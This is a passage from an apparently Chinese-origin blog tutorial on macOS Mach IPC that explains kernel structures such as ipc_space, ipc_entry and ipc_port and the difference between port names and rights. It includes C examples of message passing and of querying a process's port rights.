class="line">    </span><br><span class="line">    <span class="comment">// Add a send right to the port</span></span><br><span class="line">    kr = <span class="built_in">mach_port_insert_right</span>(<span class="built_in">mach_task_self</span>(), port, port, MACH_MSG_TYPE_MAKE_SEND);</span><br><span class="line">    <span class="built_in">assert</span> (kr == KERN_SUCCESS);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[receiver] mach_port_insert_right() inserted a send right\n&quot;</span>);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// Register the port&#x27;s send right with bootstrap so that other processes can look it up</span></span><br><span class="line">    kr = <span class="built_in">bootstrap_register</span>(bootstrap_port, <span class="string">&quot;io.github.kiprey&quot;</span>, port);</span><br><span class="line">    <span class="built_in">assert</span> (kr == KERN_SUCCESS);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[receiver] bootstrap_register()&#x27;ed our port\n&quot;</span>);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// Wait for a message</span></span><br><span class="line">    <span class="type">mach_msg_receive_t</span> message;</span><br><span class="line">    <span class="type">mach_msg_option_t</span> option = MACH_RCV_MSG </span><br><span class="line">                            | <span class="built_in">MACH_RCV_TRAILER_TYPE</span>(MACH_MSG_TRAILER_FORMAT_0) </span><br><span class="line">                            | <span class="built_in">MACH_RCV_TRAILER_ELEMENTS</span>(MACH_RCV_TRAILER_SENDER);</span><br><span class="line">    kr = <span class="built_in">mach_msg</span>(&amp;message.recv_content.header, option,</span><br><span class="line">            <span class="number">0</span>, <span class="built_in">sizeof</span>(message), port,</span><br><span class="line">            MACH_MSG_TIMEOUT_NONE, 
MACH_PORT_NULL);</span><br><span class="line"></span><br><span class="line">    <span class="built_in">assert</span> (kr == KERN_SUCCESS);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[receiver] Got a message\n&quot;</span>);</span><br><span class="line"></span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[receiver] Text: %s, number: %d\n&quot;</span>, message.recv_content.texts, message.recv_content.integer);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[receiver] Security token = UID(%u) GID(%u)\n&quot;</span>, </span><br><span class="line">           message.trailer.msgh_sender.val[<span class="number">0</span>],  <span class="comment">// sender&#x27;s user ID </span></span><br><span class="line">           message.trailer.msgh_sender.val[<span class="number">1</span>]); <span class="comment">// sender&#x27;s group ID</span></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">main</span><span class="params">(<span class="type">int</span> argc, <span class="type">const</span> <span class="type">char</span> * argv[])</span> </span>&#123;</span><br><span class="line">    fork() ? <span class="built_in">sender</span>() : <span class="built_in">receiver</span>();</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>Test output:</p><p><img src="/2021/12/mach_ipc_intro/image-20211230155320740.png" alt="image-20211230155320740"></p><h2 id="六、部分内核类型介绍">VI. Selected Kernel Types</h2><h3 id="1-ipc-space">1. 
ipc_space</h3><p>The task structure contains a field, <code>struct ipc_space *itk_space</code>, that holds the IPC state used by the task. The structure is defined as follows:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">struct</span> <span class="title class_">ipc_space</span> &#123;</span><br><span class="line">    <span class="type">lck_spin_t</span>    is_lock_data;</span><br><span class="line">    <span class="type">ipc_space_refs_t</span> is_bits;    <span class="comment">/* holds refs, active, growing */</span></span><br><span class="line">    <span class="type">ipc_entry_num_t</span> is_table_size;    <span class="comment">/* current size of table */</span></span><br><span class="line">    <span class="type">ipc_entry_num_t</span> is_table_free;    <span class="comment">/* count of free elements */</span></span><br><span class="line">    <span class="type">ipc_entry_t</span> is_table;        <span class="comment">/* an array of entries */</span></span><br><span class="line">    <span class="type">task_t</span> is_task;                 <span class="comment">/* associated task */</span></span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">ipc_table_size</span> *is_table_next; <span class="comment">/* info for larger table */</span></span><br><span class="line">    <span class="type">ipc_entry_num_t</span> is_low_mod;    <span class="comment">/* lowest modified entry during growth */</span></span><br><span class="line">    <span 
class="type">ipc_entry_num_t</span> is_high_mod;    <span class="comment">/* highest modified entry during growth */</span></span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">bool_gen</span> bool_gen;       <span class="comment">/* state for boolean RNG */</span></span><br><span class="line">    <span class="type">unsigned</span> <span class="type">int</span> is_entropy[IS_ENTROPY_CNT]; <span class="comment">/* pool of entropy taken from RNG */</span></span><br><span class="line">    <span class="type">int</span> is_node_id;            <span class="comment">/* HOST_LOCAL_NODE, or remote node if proxy space */</span></span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure><p>The <code>is_table</code> field points to an array of <code>struct ipc_entry</code> elements whose length is <code>is_table_size</code>. A mach port name used in user space (an integer) maps to one of these entries in the kernel. <code>is_table</code> is populated with some initial entries when it is created.</p><p>The <code>is_bits</code> field packs several pieces of control state: the reference count, whether the ipc_space is <strong>active</strong>, and whether it is <strong>currently growing its table (growing)</strong>. The growing bit is a simple flag that <strong>prevents race conditions</strong>. When the kernel uses an ipc_space and finds that is_table is too small, it tries to grow the table; but if the <strong>current</strong> kernel thread finds that <strong>another kernel thread is already growing this ipc_space</strong>, it <strong>sleeps first (is_write_sleep)</strong> and continues only after the other thread has finished.</p><p>Once the <strong>receive right</strong> of a mach port <strong>is released</strong>, the port itself is <strong>considered destroyed</strong>. If nothing references the port at that point, the corresponding ipc_entry in is_table is <strong>returned to the free list (is_table_free)</strong>, and every remaining right to the destroyed port becomes MACH_PORT_RIGHT_DEAD_NAME, meaning those rights are all dead.</p><blockquote><p>This mechanism keeps a port name from being reused too early.</p></blockquote><p>When the ipc_space needs a new ipc_entry, it first tries to take the earliest-freed ipc_entry from is_table_free and reuse it (that is, <strong>is_table_free is FIFO</strong>); if is_table_free is empty, it tries to <strong>grow</strong> the ipc_space and inserts a new ipc_entry.</p><blockquote><p>Note that even after the receive right of a mach port has been released, if the port is still referenced (at which point its rights are
dead names), the next mach port allocation still cannot reuse that mach port name.</p></blockquote><h3 id="2-ipc-entry">2. ipc_entry</h3><p>A user-space mach port name (an integer) corresponds to an ipc_entry in the kernel's <code>task-&gt;itk_space-&gt;is_table</code>. The ipc_entry structure is declared as follows:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">struct</span> <span class="title class_">ipc_entry</span> &#123;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">ipc_object</span> *ie_object;</span><br><span class="line">    <span class="type">ipc_entry_bits_t</span> ie_bits;</span><br><span class="line">    <span class="type">mach_port_index_t</span> ie_index;</span><br><span class="line">    <span class="keyword">union</span> &#123;</span><br><span class="line">        <span class="type">mach_port_index_t</span> next;        <span class="comment">/* next in freelist, or...  */</span></span><br><span class="line">        <span class="type">ipc_table_index_t</span> request;    <span class="comment">/* dead name request notify */</span></span><br><span class="line">    &#125; index;</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure><p>The <code>ie_object</code> pointer refers to one of two structures: <code>ipc_port</code> or <code>ipc_pset</code>.</p><p>The <code>ie_bits</code> flag field records which types of right the given port name denotes.</p><h3 id="3-ipc-port">3. 
ipc_port</h3><p>The ipc_port structure represents a single mach port. It records the Mach message queue, the port's receiver and destination, kernel-stored data, and so on. The fields are not explained one by one here; each is covered when it comes up.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span 
class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">struct</span> <span class="title class_">ipc_port</span> &#123;</span><br><span class="line"></span><br><span class="line">    <span class="comment">/*</span></span><br><span class="line"><span class="comment">     * Initial sub-structure in common with ipc_pset</span></span><br><span class="line"><span class="comment">     * First element is an ipc_object second is a</span></span><br><span class="line"><span class="comment">     * message queue</span></span><br><span class="line"><span class="comment">     */</span></span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">ipc_object</span> ip_object;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">ipc_mqueue</span> ip_messages;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">union</span> &#123;</span><br><span class="line">        <span class="keyword">struct</span> <span class="title class_">ipc_space</span> *receiver;</span><br><span class="line">        <span class="keyword">struct</span> <span class="title class_">ipc_port</span> *destination;</span><br><span class="line">        <span class="type">ipc_port_timestamp_t</span> timestamp;</span><br><span class="line">    &#125; data;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">union</span> &#123;</span><br><span class="line">        <span class="type">ipc_kobject_t</span> kobject;</span><br><span class="line">        <span class="type">ipc_importance_task_t</span> imp_task;</span><br><span class="line">        <span class="type">ipc_port_t</span> sync_qos_override_port;</span><br><span class="line">    &#125; kdata;</span><br><span class="line">        </span><br><span class="line">    <span class="keyword">struct</span> <span class="title 
class_">ipc_port</span> *ip_nsrequest;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">ipc_port</span> *ip_pdrequest;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">ipc_port_request</span> *ip_requests;</span><br><span class="line">    <span class="keyword">union</span> &#123;</span><br><span class="line">        <span class="keyword">struct</span> <span class="title class_">ipc_kmsg</span> *premsg;</span><br><span class="line">        <span class="keyword">struct</span> &#123;</span><br><span class="line">            <span class="type">sync_qos_count_t</span> sync_qos[THREAD_QOS_LAST];</span><br><span class="line">            <span class="type">sync_qos_count_t</span> special_port_qos;</span><br><span class="line">        &#125; qos_counter;</span><br><span class="line">    &#125; kdata2;</span><br><span class="line"></span><br><span class="line">    <span class="type">mach_vm_address_t</span> ip_context;</span><br><span class="line"></span><br><span class="line">    <span class="type">natural_t</span> ip_sprequests:<span class="number">1</span>,    <span class="comment">/* send-possible requests outstanding */</span></span><br><span class="line">          ip_spimportant:<span class="number">1</span>,    <span class="comment">/* ... 
at least one is importance donating */</span></span><br><span class="line">          ip_impdonation:<span class="number">1</span>,    <span class="comment">/* port supports importance donation */</span></span><br><span class="line">          ip_tempowner:<span class="number">1</span>,    <span class="comment">/* dont give donations to current receiver */</span></span><br><span class="line">          ip_guarded:<span class="number">1</span>,         <span class="comment">/* port guarded (use context value as guard) */</span></span><br><span class="line">          ip_strict_guard:<span class="number">1</span>,    <span class="comment">/* Strict guarding; Prevents user manipulation of context values directly */</span></span><br><span class="line">          ip_specialreply:<span class="number">1</span>,    <span class="comment">/* port is a special reply port */</span></span><br><span class="line">          ip_link_sync_qos:<span class="number">1</span>,    <span class="comment">/* link the special reply port to destination port */</span></span><br><span class="line">          ip_impcount:<span class="number">24</span>;    <span class="comment">/* number of importance donations in nested queue */</span></span><br><span class="line"></span><br><span class="line">    <span class="type">mach_port_mscount_t</span> ip_mscount;</span><br><span class="line">    <span class="type">mach_port_rights_t</span> ip_srights;</span><br><span class="line">    <span class="type">mach_port_rights_t</span> ip_sorights;</span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="keyword">if</span> MACH_ASSERT</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> IP_NSPARES  4</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> IP_CALLSTACK_MAX    16</span></span><br><span class="line"><span class="comment">/*  queue_chain_t   ip_port_links;*/</span><span class="comment">/* all 
allocated ports */</span></span><br><span class="line">    <span class="type">thread_t</span>    ip_thread;  <span class="comment">/* who made me?  thread context */</span></span><br><span class="line">    <span class="type">unsigned</span> <span class="type">long</span>   ip_timetrack;   <span class="comment">/* give an idea of &quot;when&quot; created */</span></span><br><span class="line">    <span class="type">uintptr_t</span>   ip_callstack[IP_CALLSTACK_MAX]; <span class="comment">/* stack trace */</span></span><br><span class="line">    <span class="type">unsigned</span> <span class="type">long</span>   ip_spares[IP_NSPARES]; <span class="comment">/* for debugging */</span></span><br><span class="line"><span class="meta">#<span class="keyword">endif</span>  <span class="comment">/* MACH_ASSERT */</span></span></span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure><h3 id="4-ipc-pset">4. ipc_pset</h3><p>The ipc_pset structure represents a port set, that is, a collection of mach ports. Its declaration is:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">struct</span> <span class="title class_">ipc_pset</span> &#123;</span><br><span class="line"></span><br><span class="line">    <span class="comment">/*</span></span><br><span class="line"><span class="comment">     * Initial sub-structure in common with all ipc_objects.</span></span><br><span class="line"><span class="comment">     */</span></span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">ipc_object</span>    ips_object;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">ipc_mqueue</span>    ips_messages;</span><br><span 
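class="line">&#125;;</span><br></pre></td></tr></table></figure><blockquote><p>Note that <strong>the first member of both structures above is a <code>struct ipc_object</code></strong>.</p><p>So when the ie_object pointer in an ipc_entry points to <strong>the ipc_object member embedded in either structure</strong>, it is <strong>equivalent to pointing at the base address of that structure</strong>.</p></blockquote><h3 id="5-mach-port-t-与-mach-port-name-t">5. mach_port_t and mach_port_name_t</h3><blockquote><p><strong>Note: this section is important.</strong></p></blockquote><p>When calling mach APIs from user space, we often see both the <code>mach_port_t</code> and <code>mach_port_name_t</code> types, and it is easy to <strong>confuse them</strong> (I certainly did while learning mach).</p><p>The reasons for the confusion are simple:</p><ol><li>In user space, values of the two types <strong>print as the same integer</strong>.</li><li>Many mach APIs are called with a <code>mach_port_t</code> value passed directly as a <code>mach_port_name_t</code> argument.</li><li>Some function declarations are misleading: the parameter has type <code>mach_port_t</code>, yet it is called <code>name</code>.</li></ol><p>Although the two types hold the same value in user space, they differ significantly inside the kernel.</p><ul><li><p>A <strong>port name</strong> (<strong>mach_port_name_t</strong>) <strong>merely identifies a port within one specific task</strong> and <strong>carries no information about the rights to that port</strong>.</p></li><li><p>A <strong>port</strong> (<strong>mach_port_t</strong>) is <strong>a reference</strong> to which <strong>port rights can be added or removed</strong>. When the kernel returns such a reference to user space, what user space receives is the <strong>name</strong> of that reference, i.e. the port name. This is why, in user space, variables of type mach_port_name_t and mach_port_t returned by the kernel hold the same integer value.</p><blockquote><p><strong>Normally</strong>, for a given mach port, the <strong>names that refer to different rights</strong> are <strong>distinct</strong>. There are exceptions, described below.</p></blockquote><p>Note, however, that inside the kernel a mach_port_t really does map to an ipc_port structure, which contains data about the port's rights. A mach_port_name_t is only an integer representation of a mach port; it maps to no ipc_port structure and therefore carries no right information for that port.</p></li></ul><p>One more point: for a particular mach port (that is, names referring to the same ipc_port structure), if a task holds several rights to it, for example both a send right and a receive right, the names of those rights are coalesced into a single name, so one name can denote both the send right and the receive right of the target port. A send-once right, however, always gets a unique name of its own: a separate name is always used to denote a send-once right to the port.</p><p>Once the two types are clearly told apart, the relationships among mach_port_t, mach_port_name_t, mach port rights and mach ports become clear as well, which helps a great deal in understanding mach IPC. Here is a full summary of how ports, rights and names relate:</p><ul><li><p>What we usually call a <strong>mach port</strong> is an <strong>ipc_port structure</strong> in the <strong>kernel</strong>; messages can be sent to it and received from it.</p></li><li><p>A mach port may have rights in some tasks. These rights specify what the task may do with the port, such as receiving or sending messages. Any mach port to which <strong>the current task</strong> <strong>holds a right</strong> must have <strong>an ipc_entry</strong> in the current task's ipc_space, whose ie_object points to the port's ipc_port structure.</p><p>Therefore, in the <strong>kernel</strong> (not in user space), <code>mach_port_t</code> denotes a reference to <strong>one right</strong> on a mach port in the <strong>current task</strong>.</p><blockquote><p>Note that in the kernel <code>mach_port_t</code> does <strong>not</strong> directly stand for a mach port itself. Confusing, isn't it?</p></blockquote></li><li><p>By contrast, <code>mach_port_name_t</code>, in <strong>both the kernel and user space</strong>, <strong>merely identifies</strong> a mach port; it <strong>involves no right</strong>, let alone a reference to one.</p></li><li><p>When the kernel returns a <code>mach_port_t</code> reference to <strong>user space</strong>, what <strong>user space</strong> actually receives, unlike in the kernel, is <strong>the name of the corresponding right</strong>. In other words, in user space a mach_port_t value is the <strong>name</strong> of a <strong>right</strong> to some mach port (note that it is <strong>not a direct reference</strong> to the right). That is why a <code>mach_port_t</code> value and a <code>mach_port_name_t</code> value are the same.</p></li><li><p>Following on from that, in <strong>user space</strong> a mach_port_t value is normally the name of <strong>one right</strong> to some mach port.</p><p>However, if a mach_port_t already holds <strong>the name of a send right to a mach port</strong> and the user then obtains <strong>a receive right to the same mach port (note the two rights are of different types)</strong>, the request reuses the existing send right name. The resulting name then denotes both the send right and the receive right.</p><p>This mechanism is called <strong>name coalescing</strong>: the names of rights of different types to the same port can be merged into one name that denotes several rights. Note, however, that <strong>send-once right names are never coalesced</strong>.</p><blockquote><p>For example, if two mach_port_t variables hold the names of a <strong>send right</strong> and a <strong>send-once right</strong> to the same mach port, the two variables have different values.</p></blockquote></li></ul><h2 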
id="七、部分-IPC-基础-API">VII. Selected Basic IPC APIs</h2><h3 id="1-User-Mode">1. User Mode</h3><h4 id="a-mach-port-names">a. mach_port_names</h4><p>Purpose: returns information about the port namespace of the specified task.</p><p>The function is declared as follows:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">kern_return_t</span>   <span class="title">mach_port_names</span></span></span><br><span class="line"><span class="function">                <span class="params">(<span class="type">ipc_space_t</span>                               task,</span></span></span><br><span class="line"><span class="params"><span class="function">                 <span class="type">mach_port_name_array_t</span>                  *names,</span></span></span><br><span class="line"><span class="params"><span class="function">                 <span class="type">mach_msg_type_number_t</span>               *namesCnt,</span></span></span><br><span class="line"><span class="params"><span class="function">                 <span class="type">mach_port_type_array_t</span>                  *types,</span></span></span><br><span class="line"><span class="params"><span class="function">                 <span class="type">mach_msg_type_number_t</span>               *typesCnt)</span></span>;</span><br></pre></td></tr></table></figure><p>where:</p><ul><li><code>task</code>: the task port of the task to inspect; the caller must hold a send right to the target task's port.</li><li><code>names</code>: receives an array of <code>mach_port_name_t</code> values holding the query result.</li><li><code>namesCnt</code>: the number of elements in the names array.</li><li><code>types</code>: receives an array holding <strong>the right types of each corresponding name in the names array</strong>.</li><li><code>typesCnt</code>: the number of elements in the types array.</li></ul><p><strong>namesCnt should always equal typesCnt</strong>.</p><blockquote><p>The interface returns two separate counts because it is generated by the Mach Interface Generator (MIG).</p></blockquote><p>Note that the names and types buffers are allocated automatically, so release them with vm_deallocate once you are done with them.</p><h4 id="b-mach-port-get-attributes">b. mach_port_get_attributes</h4><p>Purpose: queries information about the specified port.</p><p>Declaration:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">kern_return_t</span>   <span class="title">mach_port_get_attributes</span></span></span><br><span class="line"><span class="function">                <span class="params">(<span class="type">ipc_space_t</span>                               task,</span></span></span><br><span class="line"><span class="params"><span class="function">                 <span class="type">mach_port_name_t</span>                          name,</span></span></span><br><span class="line"><span class="params"><span class="function">                 <span class="type">mach_port_flavor_t</span>                      flavor,</span></span></span><br><span class="line"><span class="params"><span class="function">                 <span class="type">mach_port_info_t</span>                     port_info,</span></span></span><br><span class="line"><span class="params"><span class="function">                 <span class="type">mach_msg_type_number_t</span>        *port_info_count)</span></span>;</span><br></pre></td></tr></table></figure><p>The parameters are:</p><ul><li><p><code>task</code>: the task that holds the port being queried</p></li><li><p><code>name</code>: the name of the port being queried</p></li><li><p><code>flavor</code>: the kind of information requested</p><p>Two flavors are covered here:</p><ul><li><strong>MACH_PORT_LIMITS_INFO</strong>: returns the port's resource limits (<strong>mach_port_limits</strong>)</li><li><strong>MACH_PORT_RECEIVE_STATUS</strong>: returns miscellaneous information about the <strong>rights and messages</strong> associated with the port (<strong>mach_port_status</strong>)</li></ul></li><li><p><code>port_info</code>: a pointer to <strong>the buffer that receives the result</strong></p></li><li><p><code>port_info_count</code>: on input, the maximum number of result elements the buffer can hold; on return, it is updated to the number actually returned.</p></li></ul><p>Below is a simple example that uses the two functions together:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span 
class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;mach/mach.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> EXIT_ON_MACH_ERROR(msg, retval) \</span></span><br><span class="line"><span class="meta">    <span class="keyword">if</span> (kr != KERN_SUCCESS)   &#123; mach_error(msg <span class="string">&quot;:&quot;</span>, kr); exit((retval)); &#125;</span></span><br><span class="line"></span><br><span 
class="line"><span class="function"><span class="type">void</span> <span class="title">print_mach_port_type</span><span class="params">(<span class="type">mach_port_type_t</span> type)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">if</span> (type &amp; MACH_PORT_TYPE_SEND)         <span class="built_in">printf</span>(<span class="string">&quot;SEND &quot;</span>);</span><br><span class="line">    <span class="keyword">if</span> (type &amp; MACH_PORT_TYPE_RECEIVE)      <span class="built_in">printf</span>(<span class="string">&quot;RECEIVE &quot;</span>);</span><br><span class="line">    <span class="keyword">if</span> (type &amp; MACH_PORT_TYPE_SEND_ONCE)    <span class="built_in">printf</span>(<span class="string">&quot;SEND_ONCE &quot;</span>);</span><br><span class="line">    <span class="keyword">if</span> (type &amp; MACH_PORT_TYPE_PORT_SET)     <span class="built_in">printf</span>(<span class="string">&quot;PORT_SET &quot;</span>);</span><br><span class="line">    <span class="keyword">if</span> (type &amp; MACH_PORT_TYPE_DEAD_NAME)    <span class="built_in">printf</span>(<span class="string">&quot;DEAD_NAME &quot;</span>);</span><br><span class="line">    <span class="keyword">if</span> (type &amp; MACH_PORT_TYPE_DNREQUEST)    <span class="built_in">printf</span>(<span class="string">&quot;DNREQUEST &quot;</span>);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;\n&quot;</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">main</span><span class="params">(<span class="type">int</span> argc, <span class="type">char</span> **argv)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="type">int</span> i;</span><br><span class="line"> 
   <span class="type">pid_t</span> pid;</span><br><span class="line">    <span class="type">kern_return_t</span> kr;</span><br><span class="line">    <span class="type">mach_port_name_array_t</span> names;</span><br><span class="line">    <span class="type">mach_port_type_array_t</span> types;</span><br><span class="line">    <span class="type">mach_msg_type_number_t</span> ncount, tcount;</span><br><span class="line">    <span class="type">mach_port_limits_t</span> port_limits;</span><br><span class="line">    <span class="type">mach_port_status_t</span> port_status;</span><br><span class="line">    <span class="type">mach_msg_type_number_t</span> port_info_count;</span><br><span class="line">    <span class="type">task_t</span> task;</span><br><span class="line">    <span class="type">task_t</span> mytask = <span class="built_in">mach_task_self</span>();</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (argc != <span class="number">2</span>)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="built_in">fprintf</span>(stderr, <span class="string">&quot;usage: %s &lt;pid&gt;\n&quot;</span>, argv[<span class="number">0</span>]);</span><br><span class="line">        <span class="built_in">exit</span>(<span class="number">1</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    pid = <span class="built_in">atoi</span>(argv[<span class="number">1</span>]);</span><br><span class="line">    kr = <span class="built_in">task_for_pid</span>(mytask, (<span class="type">int</span>)pid, &amp;task);</span><br><span class="line">    <span class="built_in">EXIT_ON_MACH_ERROR</span>(<span class="string">&quot;task_for_pid&quot;</span>, kr);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// retrieve a list of the rights present in the given task&#x27;s IPC space,</span></span><br><span class="line">    
<span class="comment">// along with type information (no particular ordering)</span></span><br><span class="line">    kr = <span class="built_in">mach_port_names</span>(task, &amp;names, &amp;ncount, &amp;types, &amp;tcount);</span><br><span class="line">    <span class="built_in">EXIT_ON_MACH_ERROR</span>(<span class="string">&quot;mach_port_names&quot;</span>, kr);</span><br><span class="line"></span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;%8s %8s %8s %8s %8s task rights\n&quot;</span>,</span><br><span class="line">           <span class="string">&quot;name&quot;</span>, <span class="string">&quot;q-limit&quot;</span>, <span class="string">&quot;seqno&quot;</span>, <span class="string">&quot;msgcount&quot;</span>, <span class="string">&quot;sorights&quot;</span>);</span><br><span class="line">    <span class="keyword">for</span> (i = <span class="number">0</span>; i &lt; ncount; i++)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">&quot;%08x &quot;</span>, names[i]);</span><br><span class="line"></span><br><span class="line">        <span class="comment">// get resource limits for the port</span></span><br><span class="line">        port_info_count = MACH_PORT_LIMITS_INFO_COUNT;</span><br><span class="line">        kr = <span class="built_in">mach_port_get_attributes</span>(</span><br><span class="line">            task,                           <span class="comment">// the IPC space in question</span></span><br><span class="line">            names[i],                       <span class="comment">// task&#x27;s name for the port</span></span><br><span class="line">            MACH_PORT_LIMITS_INFO,          <span class="comment">// information flavor desired</span></span><br><span class="line">            (<span class="type">mach_port_info_t</span>)&amp;port_limits, <span class="comment">// outcoming 
